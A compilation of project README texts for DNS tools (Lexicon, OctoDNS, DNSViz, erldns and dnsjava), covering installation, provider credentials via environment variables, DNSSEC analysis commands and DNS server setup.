{A,AAAA,CNAME,MX,NS,SPF,SOA,TXT,SRV,LOC}
specify the entry type

optional arguments:
-h, --help show this help message and exit
--name NAME specify the record name
--content CONTENT specify the record content
--ttl TTL specify the record time-to-live
--priority PRIORITY specify the record priority
--identifier IDENTIFIER
specify the record for update or delete actions
--auth-username AUTH_USERNAME
specify email address used to authenticate
--auth-token AUTH_TOKEN
specify token used authenticate
Using the lexicon CLI is pretty simple:
# setup provider environmental variables:
export LEXICON_CLOUDFLARE_USERNAME="myusername@example.com"
export LEXICON_CLOUDFLARE_TOKEN="cloudflare-api-token"

# list all TXT records on cloudflare
lexicon cloudflare list example.com TXT

# create a new TXT record on cloudflare
lexicon cloudflare create www.example.com TXT --name="_acme-challenge.www.example.com." --content="challenge token"

# delete a TXT record on cloudflare
lexicon cloudflare delete www.example.com TXT --name="_acme-challenge.www.example.com." --content="challenge token"
lexicon cloudflare delete www.example.com TXT --identifier="cloudflare record id"

Authentication

Most supported DNS services provide an API token, however each service implements authentication differently. Lexicon attempts to standardize authentication around the following CLI flags:
  • --auth-username - For DNS services that require it, this is usually the account id or email address
  • --auth-password - For DNS services that do not provide an API token, this is usually the account password
  • --auth-token - This is the most common auth method, the API token provided by the DNS service
You can see all the --auth-* flags for a specific service by reading the DNS service specific help: lexicon cloudflare -h

Environmental Variables

Instead of providing Authentication information via the CLI, you can also specify them via Environmental Variables. Every DNS service and auth flag maps to an Environmental Variable as follows: LEXICON_{DNS Provider Name}_{Auth Type}
So instead of specifying --auth-username and --auth-token flags when calling lexicon cloudflare ..., you could instead set the LEXICON_CLOUDFLARE_USERNAME and LEXICON_CLOUDFLARE_TOKEN environmental variables.
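As a small illustration of that mapping (the helper below is hypothetical, not part of Lexicon), you can build the variable names programmatically and hand them to the CLI instead of passing --auth-* flags:

# Build LEXICON_{PROVIDER}_{AUTH TYPE} names per the convention above and
# invoke the CLI with them. Credential values are placeholders.
import os
import subprocess

def lexicon_env(provider: str, **auth) -> dict:
    env = dict(os.environ)
    for flag, value in auth.items():          # e.g. username="...", token="..."
        env[f"LEXICON_{provider.upper()}_{flag.upper()}"] = value
    return env

env = lexicon_env("cloudflare", username="myusername@example.com",
                  token="cloudflare-api-token")
# same as the "list all TXT records" example earlier in this README
subprocess.run(["lexicon", "cloudflare", "list", "example.com", "TXT"],
               env=env, check=True)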

Letsencrypt Instructions

Lexicon has an example dehydrated hook file that you can use for any supported provider. All you need to do is set the PROVIDER env variable.
PROVIDER=cloudflare dehydrated --cron --hook dehydrated.default.sh --challenge dns-01
Lexicon can also be used with Certbot and the included Certbot hook file (requires configuration).

TroubleShooting & Useful Tools

There is an included example Dockerfile that can be used to automatically generate certificates for your website.

ToDo list

  •  Create and Register a lexicon pip package.
  •  Write documentation on supported environmental variables.
  •  Wire up automated release packaging on PRs.
  •  Check for additional dns hosts with apis (from fog, dnsperf, libcloud)
  •  Get a list of Letsencrypt clients, and create hook files for them (letsencrypt clients)
from https://github.com/AnalogJ/lexicon
----

DNS as code - Tools for managing DNS across multiple providers

In the vein of infrastructure as code OctoDNS provides a set of tools & patterns that make it easy to manage your DNS records across multiple providers. The resulting config can live in a repository and be deployed just like the rest of your code, maintaining a clear history and using your existing review & workflow.
The architecture is pluggable and the tooling is flexible to make it applicable to a wide variety of use-cases. Effort has been made to make adding new providers as easy as possible. In the simple case that involves writing a single class and a couple hundred lines of code, most of which is translating between the provider's schema and OctoDNS's. More on some of the ways we use it and how to go about extending it below and in the /docs directory.
It is similar to Netflix/denominator.


Getting started

Workspace

Running through the following commands will install the latest release of OctoDNS and set up a place for your config files to live. To determine if provider specific requirements are necessary see the Supported providers table below.
$ mkdir dns
$ cd dns
$ virtualenv env
...
$ source env/bin/activate
$ pip install octodns
$ mkdir config

Config

We start by creating a config file to tell OctoDNS about our providers and the zone(s) we want it to manage. Below we're setting up a YamlProvider to source records from our config files and both a Route53Provider and DynProvider to serve as the targets for those records. You can have any number of zones set up and any number of sources of data and targets for records for each. You can also have multiple config files that make use of separate accounts and each manage a distinct set of zones. A good example of this might be ./config/staging.yaml & ./config/production.yaml. We'll focus on config/production.yaml.
---
providers:
  config:
    class: octodns.provider.yaml.YamlProvider
    directory: ./config
    default_ttl: 3600
    enforce_order: True
  dyn:
    class: octodns.provider.dyn.DynProvider
    customer: 1234
    username: 'username'
    password: env/DYN_PASSWORD
  route53:
    class: octodns.provider.route53.Route53Provider
    access_key_id: env/AWS_ACCESS_KEY_ID
    secret_access_key: env/AWS_SECRET_ACCESS_KEY

zones:
  example.com.:
    sources:
      - config
    targets:
      - dyn
      - route53
class is a special key that tells OctoDNS what python class should be loaded. Any other keys will be passed as configuration values to that provider. In general any sensitive or frequently rotated values should come from environmental variables. When OctoDNS sees a value that starts with env/ it will look for that value in the process's environment and pass the result along.
Further information can be found in the docstring of each source and provider class.
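As a rough sketch of that env/ convention - this mirrors the behaviour described above, not OctoDNS's actual loader - resolving such values could look like:

# Resolve "env/NAME" config values from the process environment, as the
# convention above describes. Illustrative only.
import os

def resolve_value(value):
    if isinstance(value, str) and value.startswith("env/"):
        # real code would likely fail loudly if the variable is missing
        return os.environ.get(value[len("env/"):], "")
    return value

provider_config = {
    "class": "octodns.provider.route53.Route53Provider",
    "access_key_id": "env/AWS_ACCESS_KEY_ID",
    "secret_access_key": "env/AWS_SECRET_ACCESS_KEY",
}
resolved = {key: resolve_value(val) for key, val in provider_config.items()}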
Now that we have something to tell OctoDNS about our providers & zones, we need to tell it about our records. We'll keep it simple for now and just create a single A record at the top level of the domain.
config/example.com.yaml
---
'':
  ttl: 60
  type: A
  values:
    - 1.2.3.4
    - 1.2.3.5
Further information can be found in Records Documentation.

Noop

We're ready to do a dry-run with our new setup to see what changes it would make. Since we're pretending here we'll act like there are no existing records for example.com. in our accounts on either provider.
$ octodns-sync --config-file=./config/production.yaml
...
********************************************************************************
* example.com.
********************************************************************************
* route53 (Route53Provider)
* Create
* Summary: Creates=1, Updates=0, Deletes=0, Existing Records=0
* dyn (DynProvider)
* Create
* Summary: Creates=1, Updates=0, Deletes=0, Existing Records=0
********************************************************************************
...
There will be other logging information presented on the screen, but successful runs of sync will always end with a summary like the above for any providers & zones with changes. If there are no changes, a message saying so will be printed instead. Above we're creating a new zone in both providers so they show the same change, but that doesn't always have to be the case. If one of them had started out with a different state, you would see the changes OctoDNS intends to make to sync them up.

Making changes

WARNING: OctoDNS assumes ownership of any domain you point it to. When you tell it to act it will do whatever is necessary to try and match up states including deleting any unexpected records. Be careful when playing around with OctoDNS. It's best to experiment with a fake zone or one without any data that matters until you're comfortable with the system.
Now it's time to tell OctoDNS to make things happen. We'll invoke it again with the same options and add a --doit on the end to tell it this time we actually want it to try and make the specified changes.
$ octodns-sync --config-file=./config/production.yaml --doit
...
The output here would be the same as before with a few more log lines at the end as it makes the actual changes. After which the config in Route53 and Dyn should match what's in the yaml file.

Workflow

In the above case we manually ran OctoDNS from the command line. That works and it's better than heading into the provider GUIs and making changes by clicking around, but OctoDNS is designed to be run as part of a deploy process. The implementation details are well beyond the scope of this README, but here is an example of the workflow we use at GitHub. It follows the way GitHub itself is branch deployed.
The first step is to create a PR with your changes.
Assuming the code tests and config validation statuses are green the next step is to do a noop deploy and verify that the changes OctoDNS plans to make are the ones you expect.
After that comes a set of reviews. One from a teammate who should have full context on what you're trying to accomplish and visibility into the changes you're making to do it. The other is from a member of the team here at GitHub that owns DNS, mostly as a sanity check and to make sure that best practices are being followed. As much of that as possible is baked into octodns-validate.
After the reviews it's time to branch deploy the change.
If that goes smoothly, you again see the expected changes, and verify them with dig and/or octodns-report you're good to hit the merge button. If there are problems you can quickly do a .deploy dns/master to go back to the previous state.

Bootstrapping config files

Very few situations will involve starting with a blank slate which is why there's tooling built in to pull existing data out of providers into a matching config file.
$ octodns-dump --config-file=config/production.yaml --output-dir=tmp/ example.com. route53
2017-03-15T13:33:34 INFO Manager __init__: config_file=tmp/production.yaml
2017-03-15T13:33:34 INFO Manager dump: zone=example.com., sources=('route53',)
2017-03-15T13:33:36 INFO Route53Provider[route53] populate: found 64 records
2017-03-15T13:33:36 INFO YamlProvider[dump] plan: desired=example.com.
2017-03-15T13:33:36 INFO YamlProvider[dump] plan: Creates=64, Updates=0, Deletes=0, Existing Records=0
2017-03-15T13:33:36 INFO YamlProvider[dump] apply: making changes
The above command pulled the existing data out of Route53 and placed the results into tmp/example.com.yaml. That file can be inspected and moved into config/ to become the new source. If things are working as designed a subsequent noop sync should show zero changes.

Supported providers

Provider | Requirements | Record Support | Dynamic/Geo Support | Notes
AzureProvider | azure-mgmt-dns | A, AAAA, CAA, CNAME, MX, NS, PTR, SRV, TXT | No |
CloudflareProvider | | A, AAAA, ALIAS, CAA, CNAME, MX, NS, SPF, SRV, TXT | No | CAA tags restricted
DigitalOceanProvider | | A, AAAA, CAA, CNAME, MX, NS, TXT, SRV | No | CAA tags restricted
DnsMadeEasyProvider | | A, AAAA, ALIAS (ANAME), CAA, CNAME, MX, NS, PTR, SPF, SRV, TXT | No | CAA tags restricted
DnsimpleProvider | | All | No | CAA tags restricted
DynProvider | dyn | All | Both |
EtcHostsProvider | | A, AAAA, ALIAS, CNAME | No |
GoogleCloudProvider | google-cloud-dns | A, AAAA, CAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, TXT | No |
Ns1Provider | nsone | All | Partial Geo | No health checking for GeoDNS
OVH | ovh | A, AAAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, SSHFP, TXT, DKIM | No |
PowerDnsProvider | | All | No |
Rackspace | | A, AAAA, ALIAS, CNAME, MX, NS, PTR, SPF, TXT | No |
Route53 | boto3 | A, AAAA, CAA, CNAME, MX, NAPTR, NS, PTR, SPF, SRV, TXT | Both | CNAME health checks don't support a Host header
AxfrSource | | A, AAAA, CNAME, MX, NS, PTR, SPF, SRV, TXT | No | read-only
ZoneFileSource | | A, AAAA, CNAME, MX, NS, PTR, SPF, SRV, TXT | No | read-only
TinyDnsFileSource | | A, CNAME, MX, NS, PTR | No | read-only
YamlProvider | | All | Yes | config

Notes

  • ALIAS support varies a lot from provider to provider; care should be taken to verify that your needs are met in detail.
    • Dyn's UI doesn't allow editing or viewing the TTL, but the API accepts and stores the value provided; this value does not appear to be used when served
    • Dnsimple uses the configured TTL when serving things through the ALIAS; there's also a secondary TXT record created alongside the ALIAS that octoDNS ignores
  • octoDNS itself supports non-ASCII character sets, but in testing Cloudflare is the only provider where that is currently functional end-to-end. Others have failures either in the client libraries or API calls

Custom Sources and Providers

You can check out the source and provider directory to see what's currently supported. Sources act as a source of record information. AxfrSource and TinyDnsFileSource are currently the only OSS sources, though we have several others internally that are specific to our environment. These include something to pull host data from gPanel and a similar provider that sources information about our network gear to create both A & PTR records for their interfaces. Things that might make good OSS sources include an ElbSource that pulls information about AWS Elastic Load Balancers and dynamically creates CNAMEs for them, or an Ec2Source that pulls instance information so that records can be created for hosts, similar to how our GPanelProvider works.
Most of the things included in OctoDNS are providers, the obvious difference being that they can serve as both sources and targets of data. We'd really like to see this list grow over time so if you use an unsupported provider then PRs are welcome. The existing providers should serve as reasonable examples. Those that have no GeoDNS support are relatively straightforward. Unfortunately most of the APIs involved to do GeoDNS style traffic management are complex and somewhat inconsistent so adding support for that function would be nice, but is optional and best done in a separate pass.
The class key in the providers config section can be used to point to arbitrary classes in the python path so internal or 3rd party providers can easily be included with no coordination beyond getting them into PYTHONPATH, most likely installed into the virtualenv with OctoDNS.
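The general mechanism such a class key implies is standard dotted-path loading; a minimal sketch (OctoDNS's own loader may differ) looks like this:

# Load a class from a "module.path.ClassName" string, the pattern a
# pluggable "class:" config key suggests. Not OctoDNS's own code.
import importlib

def load_class(dotted_path: str):
    module_path, _, class_name = dotted_path.rpartition(".")
    module = importlib.import_module(module_path)
    return getattr(module, class_name)

# e.g. the YamlProvider used in the config examples above
YamlProvider = load_class("octodns.provider.yaml.YamlProvider")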

Other Uses

Syncing between providers

While the primary use-case is to sync a set of yaml config files up to one or more DNS providers, OctoDNS has been built in such a way that you can easily source and target things arbitrarily. As a quick example the config below would sync githubtest.net. from Route53 to Dyn.
---
providers:
  route53:
    class: octodns.provider.route53.Route53Provider
    access_key_id: env/AWS_ACCESS_KEY_ID
    secret_access_key: env/AWS_SECRET_ACCESS_KEY
  dyn:
    class: octodns.provider.dyn.DynProvider
    customer: env/DYN_CUSTOMER
    username: env/DYN_USERNAME
    password: env/DYN_PASSWORD

zones:
  githubtest.net.:
    sources:
      - route53
    targets:
      - dyn

Dynamic sources

Internally we use custom sources to create records based on dynamic data that changes frequently without direct human intervention. An example of that might look something like the following. For hosts this mechanism is janitorial, run periodically, making sure the correct records exist as long as the host is alive and ensuring they are removed after the host is destroyed. The host provisioning and destruction processes do the actual work to create and destroy the records.
---
providers:
  gpanel-site:
    class: github.octodns.source.gpanel.GPanelProvider
    host: 'gpanel.site.github.foo'
    token: env/GPANEL_SITE_TOKEN
  powerdns-site:
    class: octodns.provider.powerdns.PowerDnsProvider
    host: 'internal-dns.site.github.foo'
    api_key: env/POWERDNS_SITE_API_KEY

zones:
  hosts.site.github.foo.:
    sources:
      - gpanel-site
    targets:
      - powerdns-site
from https://github.com/github/octodns

dnsviz



Description

DNSViz is a tool suite for analysis and visualization of Domain Name System (DNS) behavior, including its security extensions (DNSSEC). This tool suite powers the Web-based analysis available at http://dnsviz.net/

Installation

DNSViz packages are available in repositories for popular operating systems, such as Debian, Ubuntu, and FreeBSD. DNSViz can also be installed on Mac OS X via Homebrew or MacPorts.
The remainder of this section covers other methods of installation, including a list of dependencies, installation to a virtual environment, and installation on Fedora and RHEL6 or RHEL7.
Instructions for running in a Docker container are also available later in this document.

Dependencies

Note that the software versions listed above are known to work with the current version of DNSViz. Other versions might also work well together, but might have some caveats. For example, while the current version of DNSViz works with python 2.6, the importlib (https://pypi.python.org/pypi/importlib) and ordereddict (https://pypi.python.org/pypi/ordereddict) packages are additionally required. Also for python 2.6, pygraphviz version 1.1 or 1.2 is required (pygraphviz version 1.3 dropped support for python 2.6).

Optional Software

  • With OpenSSL version 1.1.0 and later, the OpenSSL GOST Engine is necessary to validate DNSSEC signatures with algorithm 12 (GOST R 34.10-2001) and create digests of type 3 (GOST R 34.11-94).
  • When using DNSViz for pre-deployment testing by specifying zone files and/or alternate delegation information on the command line (i.e., with -N, -x, or -D), named(8) is invoked to serve one or more zones. ISC BIND is only needed in this case, and named(8) does not need to be running (i.e., as a server).
    Note that default AppArmor policies for Debian are known to cause issues when invoking named(8) from DNSViz for pre-deployment testing. Two solutions to this problem are to either: 1) create a local policy for AppArmor that allows named(8) to run with fewer restrictions; or 2) disable AppArmor completely.

Installation in a Virtual Environment

To install DNSViz to a virtual environment, first create and activate a virtual environment, and install the dependencies:
$ virtualenv ~/myenv
$ source ~/myenv/bin/activate
(myenv) $ pip install -r requirements.txt
(Note that this installs the dependencies that are python packages, but some of these packages have non-python dependencies, such as Graphviz (required for pygraphviz) and libsodium (required for libnacl), that are not installed automatically.)
Next download and install DNSViz from the Python Package Index (PyPI):
(myenv) $ pip install dnsviz
or locally, from a downloaded copy of DNSViz:
(myenv) $ pip install .

Fedora RPM Build and Install

A Fedora RPM can be built for either python2 or python3. However, note that with Fedora releases after 29, python2 packages are being removed, so python3 is preferred.
The value of ${PY_VERS} is either 2 or 3, corresponding to python2 or python3.
Install the tools for building an RPM, and set up the rpmbuild tree.
$ sudo dnf install rpm-build rpmdevtools python${PY_VERS}-devel
$ rpmdev-setuptree
From within the DNSViz source directory, create a source distribution tarball and copy it and the DNSViz spec file to the appropriate rpmbuild subdirectories.
$ python setup.py sdist
$ cp dist/dnsviz-*.tar.gz ~/rpmbuild/SOURCES/
$ cp contrib/dnsviz-py${PY_VERS}.spec ~/rpmbuild/SPECS/dnsviz.spec
Install dnspython, pygraphviz, M2Crypto, and libnacl.
$ sudo dnf install python${PY_VERS}-dns python${PY_VERS}-pygraphviz python${PY_VERS}-libnacl
For python2:
$ sudo dnf install m2crypto
For python3:
$ sudo dnf install python3-m2crypto
Build and install the DNSViz RPM.
$ rpmbuild -ba rpmbuild/SPECS/dnsviz.spec
$ sudo rpm -iv rpmbuild/RPMS/noarch/dnsviz-*-1.*.noarch.rpm

RHEL6/RHEL7 RPM Build and Install

Install pygraphviz and M2Crypto, after installing their build dependencies.
$ sudo yum install python-setuptools gcc python-devel graphviz-devel openssl-devel
$ sudo easy_install pbr
$ sudo easy_install m2crypto pygraphviz==1.2
(RHEL6 only) Install the EPEL repository, and the necessary python libraries from that repository.
$ sudo yum install epel-release
$ sudo yum install python-importlib python-ordereddict
Install dnspython.
$ sudo yum install python-dns
Install rpm-build tools, then build and install the DNSViz RPM.
$ sudo yum install rpm-build
$ python setup.py bdist_rpm --install-script contrib/rpm-install.sh --distribution-name el${RHEL_VERS}
$ sudo rpm -iv dist/dnsviz-*-1.noarch.rpm
Note that a custom install script is used to properly install the DNSViz man pages. The value of ${RHEL_VERS} corresponds to the RHEL version (e.g., 6 or 7).

Usage

DNSViz is invoked using the dnsviz command-line utility. dnsviz itself uses several subcommands: probe, grok, graph, print, and query. See the man pages associated with each subcommand, in the form of "dnsviz-<subcommand> (1)" (e.g., "man dnsviz-probe"), for more detailed documentation and usage.

dnsviz probe

dnsviz probe takes one or more domain names as input and performs a series of queries to either recursive (default) or authoritative DNS servers, the results of which are serialized into JSON format.

Examples

Analyze the domain name example.com using your configured DNS resolvers (i.e., in /etc/resolv.conf) and store the queries and responses in the file named "example.com.json":
$ dnsviz probe example.com > example.com.json
Same thing:
$ dnsviz probe -o example.com.json example.com
Analyze the domain name example.com by querying its authoritative servers directly:
$ dnsviz probe -A -o example.com.json example.com
Analyze the domain name example.com by querying explicitly-defined authoritative servers, rather than learning the servers through referrals from the IANA root servers:
$ dnsviz probe -A \
-x example.com:a.iana-servers.org=199.43.132.53,a.iana-servers.org=[2001:500:8c::53] \
-x example.com:b.iana-servers.org=199.43.133.53,b.iana-servers.org=[2001:500:8d::53] \
-o example.com.json example.com
Same, but have dnsviz probe resolve the names:
$ dnsviz probe -A \
-x example.com:a.iana-servers.org,b.iana-servers.org \
-o example.com.json example.com
Analyze the domain name example.com and its entire ancestry by querying authoritative servers and following delegations, starting at the root:
$ dnsviz probe -A -a . -o example.com.json example.com
Analyze multiple names in parallel (four threads) using explicit recursive resolvers (replace 192.0.2.1 and 2001:db8::1 with legitimate resolver addresses):
$ dnsviz probe -s 192.0.2.1,[2001:db8::1] -t 4 -o multiple.json \
example.com sandia.gov verisignlabs.com dnsviz.net

dnsviz grok

dnsviz grok takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is also serialized into JSON format.

Examples

Process the query/response output produced by dnsviz probe, and store the serialized results in a file named "example.com-chk.json":
$ dnsviz grok < example.com.json > example.com-chk.json
Same thing:
$ dnsviz grok -r example.com.json -o example.com-chk.json example.com
Show only info-level information: descriptions, statuses, warnings, and errors:
$ dnsviz grok -l info -r example.com.json -o example.com-chk.json
Show descriptions only if there are related warnings or errors:
$ dnsviz grok -l warning -r example.com.json -o example.com-chk.json
Show descriptions only if there are related errors:
$ dnsviz grok -l error -r example.com.json -o example.com-chk.json
Use root key as DNSSEC trust anchor, to additionally indicate authentication status of responses:
$ dig +noall +answer . dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz grok -l info -t tk.txt -r example.com.json -o example.com-chk.json
Pipe dnsviz probe output directly to dnsviz grok:
$ dnsviz probe example.com | \
dnsviz grok -l info -o example.com-chk.json
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz grok -l info -o example.com-chk.json
Assess multiple names at once with error level:
$ dnsviz grok -l error -r multiple.json -o example.com-chk.json

dnsviz graph

dnsviz graph takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is an image file, a dot (directed graph) file, or an HTML file, depending on the options passed.

Examples

Process the query/response output produced by dnsviz probe, and produce a graph visually representing the results in a png file named "example.com.png".
$ dnsviz graph -Tpng < example.com.json > example.com.png
Same thing:
$ dnsviz graph -Tpng -o example.com.png example.com < example.com.json
Same thing, but produce interactive HTML output in a file named "example.com.html":
$ dnsviz graph -Thtml < example.com.json > example.com.html
Same thing (filename is derived from domain name and output format):
$ dnsviz graph -Thtml -O -r example.com.json
Use alternate DNSSEC trust anchor:
$ dig +noall +answer example.com dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz graph -Thtml -O -r example.com.json -t tk.txt
Pipe dnsviz probe output directly to dnsviz graph:
$ dnsviz probe example.com | \
dnsviz graph -Thtml -O
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz graph -Thtml -O
Process analysis of multiple domain names, creating an image for each name processed:
$ dnsviz graph -Thtml -O -r multiple.json
Process analysis of multiple domain names, creating a single image for all names.
$ dnsviz graph -Thtml -r multiple.json > multiple.html

dnsviz print

dnsviz print takes serialized query results in JSON format (i.e., output from dnsviz probe) as input and assesses specified domain names based on their corresponding content in the input. The output is textual output suitable for file or terminal display.

Examples

Process the query/response output produced by dnsviz probe, and output the results to the terminal:
$ dnsviz print < example.com.json
Use alternate DNSSEC trust anchor:
$ dig +noall +answer example.com dnskey | awk '$5 % 2 { print $0 }'> tk.txt
$ dnsviz print -r example.com.json -t tk.txt
Pipe dnsviz probe output directly to dnsviz print:
$ dnsviz probe example.com | \
dnsviz print
Same thing, but save the raw output (for re-use) along the way:
$ dnsviz probe example.com | tee example.com.json | \
dnsviz print

dnsviz query

dnsviz query is a wrapper that couples the functionality of dnsviz probe and dnsviz print into a tool with minimal dig-like usage, used to make analysis queries and return the textual output to terminal or file output in one go.

Examples

Analyze the domain name example.com using the first of your configured DNS resolvers (i.e., in /etc/resolv.conf):
$ dnsviz query example.com
Same, but specify an alternate trust anchor:
$ dnsviz query +trusted-key=tk.txt example.com
Analyze example.com through the recursive resolver at 192.0.2.1:
$ dnsviz query @192.0.2.1 +trusted-key=tk.txt example.com

Pre-Deployment DNS Testing

The examples in this section demonstrate usage of DNSViz for pre-deployment testing.

Pre-Delegation Testing

The following examples involve issuing diagnostic queries for a zone before it is ever delegated.
Issue queries against a zone file on the local system (example.com.zone). named(8) is invoked to serve the file locally:
$ dnsviz probe -A -x example.com+:example.com.zone example.com
(Note the use of "+", which designates that the parent servers should not be queried for DS records.)
Issue queries to a server that is serving the zone:
$ dnsviz probe -A -x example.com+:192.0.2.1 example.com
(Note that this server doesn't need to be a server in the NS RRset for example.com.)
Issue queries to the servers in the authoritative NS RRset, specified by name and/or address:
$ dnsviz probe -A \
-x example.com+:ns1.example.com=192.0.2.1 \
-x example.com+:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Specify the names and addresses corresponding to the future delegation NS records and (as appropriate) A/AAAA glue records in the parent zone (com):
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Also supply future DS records:
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
-D example.com:dsset-example.com. \
example.com

Pre-Deployment Testing of Authoritative Zone Changes

The following examples involve issuing diagnostic queries for a delegated zone before changes are deployed.
Issue diagnostic queries for a new zone file that has been created but not yet been deployed (i.e., with changes to DNSKEY or other records):
$ dnsviz probe -A -x example.com:example.com.zone example.com
(Note the absence of "+", which designates that the parent servers will be queried for DS records.)
Issue queries to a server that is serving the new version of the zone:
$ dnsviz probe -A -x example.com:192.0.2.1 example.com
(Note that this server doesn't need to be a server in the NS RRset for example.com.)

Pre-Deployment Testing of Delegation Changes

The following examples involve issuing diagnostic queries for a delegated zone before changes are deployed to the delegation, glue, or DS records for that zone.
Specify the names and addresses corresponding to the new delegation NS records and (as appropriate) A/AAAA glue records in the parent zone (com):
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
example.com
Also supply the replacement DS records:
$ dnsviz probe -A \
-N example.com:ns1.example.com=192.0.2.1 \
-N example.com:ns2.example.com=192.0.2.1,ns2.example.com=[2001:db8::1] \
-D example.com:dsset-example.com. \
example.com

Docker Container

A ready-to-use docker container is available for use.
docker pull dnsviz/dnsviz
This section only covers Docker-related examples, for more information see the Usage section.

Simple Usage

$ docker run dnsviz/dnsviz help
$ docker run dnsviz/dnsviz query example.com

Working with Files

It might be useful to mount a local working directory into the container, especially when combining multiple commands or working with zone files.
$ docker run -v "$PWD:/data:rw" dnsviz/dnsviz probe dnsviz.net > probe.json
$ docker run -v "$PWD:/data:rw" dnsviz/dnsviz graph -r probe.json -T png -O

Using a Host Network

When running authoritative queries, a host network is recommended.
$ docker run --network host dnsviz/dnsviz probe -4 -A example.com > example.json
Otherwise, you're likely to encounter the following error: dnsviz.query.SourceAddressBindError: Unable to bind to local address (EADDRNOTAVAIL)

Interactive Mode

When performing complex analyses, where you need to combine multiple DNSViz commands, use bash redirection, etc., it might be useful to run the container interactively:
$ docker run --network host -v "$PWD:/data:rw" --entrypoint /bin/sh -ti dnsviz/dnsviz
/data # dnsviz --help
from https://github.com/dnsviz/dnsviz

DNS resolution server program - erldns


Erlang-based DNS Server (serves the same role as BIND)

Serve DNS authoritative responses...with Erlang.

Building

To build clean:
./build.sh
If you've already built once and just want to recompile the erl-dns source:
./rebar compile

Zones

Zones are loaded from JSON.
Example JSON files are in the priv/ directory.
You can also write new systems to load zones by writing the zones directly to the zone cache using erldns_zone_cache:put_zone/1.

Configuration

An example configuration file can be found in erldns.config.example.
Copy it to erldns.config and modify as needed.

Running

Launch directly:
erl -config erldns.config -pa ebin -pa deps/**/ebin -s erldns
Or use Foreman:
foreman start

Querying

Here are some queries to try:
dig -p8053 @127.0.0.1 example.com a
dig -p8053 @127.0.0.1 example.com cname
dig -p8053 @127.0.0.1 example.com ns
dig -p8053 @127.0.0.1 example.com mx
dig -p8053 @127.0.0.1 example.com spf
dig -p8053 @127.0.0.1 example.com txt
dig -p8053 @127.0.0.1 example.com sshfp
dig -p8053 @127.0.0.1 example.com soa
dig -p8053 @127.0.0.1 example.com naptr

dig -p8053 @127.0.0.1 -x 127.0.0.1 ptr

Performance

In our environment (DNSimple) we are seeing 30 to 65 µs handoff times to retrieve a packet from the UDP port and give it to a worker for processing. Your performance may vary, but given those measurements (roughly the inverse of the per-packet handoff time) erl-dns is capable of handling between 15k and 30k questions per second. Please note: You may need to configure the number of workers available to handle traffic at higher volumes.

Design

The erldns_resolver module will attempt to find zone data in the zone cache. If you're embedding erl-dns in your application the easiest thing to do is to load the zone cache once the zone cache gen_server starts and to push an updated zone into the cache each time data changes.
To insert a zone, use erldns_zone_cache:put_zone({Name, Records}) where Name is a binary term such as <<"example.com">> and Records is a list of dns_rr records (whose definitions can be found in deps/dns/include/dns_records.hrl). The name of each record must be the fully qualified domain name (including the zone part).
Here's an example:
erldns_zone_cache:put_zone({
<<"example.com">>, [
#dns_rr{
name=<<"example.com">>,
type=?DNS_TYPE_A,
ttl=3600,
data=#dns_rrdata_a{ip= {1,2,3,4}}
},
#dns_rr{
name=<<"www.example.com">>,
type=?DNS_TYPE_CNAME,
ttl=3600,
data=#dns_rrdata_cname{dname=<<"example.com">>}
}
]}).

Metrics

Folsom is used to gather runtime metrics and statistics.
There is an HTTP API for querying metric data available at https://github.com/dnsimple/erldns-metrics

Admin

There is an administrative API for querying the current zone cache and for basic control. You can find it at https://github.com/dnsimple/erldns-admin

DNS resolution server program - dnsjava

The official home of dnsjava - an implementation of the DNS protocol in Java.

Overview

dnsjava is an implementation of DNS in Java. It supports all defined record types (including the DNSSEC types), and unknown types. It can be used for queries, zone transfers, and dynamic updates. It includes a cache which can be used by clients, and an authoritative only server. It supports TSIG authenticated messages, partial DNSSEC verification, and EDNS0. It is fully thread safe. It can be used to replace the native DNS support in Java.
dnsjava was started as an excuse to learn Java. It was useful for testing new features in BIND without rewriting the C resolver. It was then cleaned up and extended in order to be used as a testing framework for DNS interoperability testing. The high level API and caching resolver were added to make it useful to a wider audience. The authoritative only server was added as proof of concept.

dnsjava on Github

This repository has been a mirror of the dnsjava project at Sourceforge since 2014 to maintain the Maven build for publishing to Maven Central. As of 2019-05-15, Github is officially the new home of dnsjava.
Please use the Github issue tracker and send - well tested - pull requests. The dnsjava-users@lists.sourceforge.net mailing list still exists.

Author

  • Brian Wellington (@bwelling), March 12, 2004
  • Various contributors, see Changelog

Getting started

Run mvn package from the toplevel directory to build dnsjava. JDK 1.4 or higher is required.

Replacing the standard Java DNS functionality:

Java versions from 1.4 to 1.8 can load DNS service providers at runtime. The functionality was removed in JDK 9; a replacement has been requested but so far has not been implemented.
To load the dnsjava service provider, build dnsjava on a JDK that still supports the SPI and set the system property:
sun.net.spi.nameservice.provider.1=dns,dnsjava
This instructs the JVM to use the dnsjava service provider for DNS at the highest priority.

Testing dnsjava

Matt Rutherford contributed a number of unit tests, which are in the tests subdirectory. The hierarchy under tests mirrors the org.xbill.DNS classes. To run the unit tests, execute mvn test. The tests require JUnit.
Some high-level test programs are in org/xbill/DNS/tests.

Limitations

There's no standard way to determine what the local nameserver or DNS search path is at runtime from within the JVM. dnsjava attempts several methods until one succeeds.
  • The properties dns.server and dns.search (comma delimited lists) are checked. The servers can either be IP addresses or hostnames (which are resolved using Java's built in DNS support).
  • The sun.net.dns.ResolverConfiguration class is queried.
  • On Unix, /etc/resolv.conf is parsed.
  • On Windows, ipconfig/winipcfg is called and its output parsed. This may fail for non-English versions of Windows.
  • As a last resort, localhost is used as the nameserver, and the search path is empty.
